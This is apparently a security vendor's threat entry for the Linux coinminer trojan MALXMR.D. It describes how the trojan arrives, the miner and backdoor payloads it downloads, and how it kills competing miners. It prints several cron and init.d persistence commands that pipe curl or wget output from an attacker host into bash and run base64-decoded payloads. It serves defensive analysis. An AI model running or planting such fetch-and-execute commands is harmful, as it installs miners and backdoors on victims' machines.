Trojan.Python.MALXMR.D

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

• http://{BLOCKED}.{BLOCKED}.61.233/x86_64 -> downloaded file is detected as Coinminer.Linux.MALXMR.UWELD
• http://{BLOCKED}.{BLOCKED}.33.226/i686 -> downloaded file is detected as Coinminer.Linux.MALXMR.UWELD
• http://{BLOCKED}.{BLOCKED}.113.151/go
• http://{BLOCKED}.{BLOCKED}.113.151/x64b -> downloaded file is detected as Backdoor.Linux.KAITEN.AMR
• http://{BLOCKED}.{BLOCKED}.113.151/x32b -> downloaded file is detected as Backdoor.Linux.KAITEN.AMV

Other Details

This Trojan does the following:

• Terminates processes connected to the following ports:
  • :3333
  • :4444
  • :5555
  • :7777
  • :14444
  • :5790
  • :45700
  • :2222
  • :9999
  • :20580
  • :13531
• Terminates processes connected to the following IP:
  • {BLOCKED}.{BLOCKED}.24.12:8080
  • {BLOCKED}.{BLOCKED}.17.13:8080
  • {BLOCKED}.{BLOCKED}.11.170:443
• It creates the following cron jobs for persistence:
  • Path: /etc/cron.d/root
  • Schedule: Every Minute
  • Command: */1 * * * * root (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
  • Path: /etc/cron.d/apache/root
  • Schedule: Every Two Minutes
  • Command: */2 * * * * root (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
  • Path: /etc/cron.d/nginx
  • Schedule: Every Three Minutes
  • Command: */3 * * * * root lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/.xo; bash /tmp/.xo; rm -rf /tmp.xo\n##
  • Path: /var/spool/cron/root
  • Schedule: Every Thirty Minutes
  • Command: */30 * * * * (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi\n; rm -rf /tmp/xmi\n##
  • Path: /var/spool/cron/crontabs/root
  • Schedule: Every Minute
  • Command: * * * * * (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
  • Path: /etc/cron.hourly/oanacroner1
  • Schedule: Every Hour
  • Command: (curl -fsSL http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O- http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi
• It creates the following service for persistence:
  • Path: /etc/init.d/down
  • Command: (curl -fsSL http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O- http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo "{base 64 encoded string}" | base64 -d | bash -'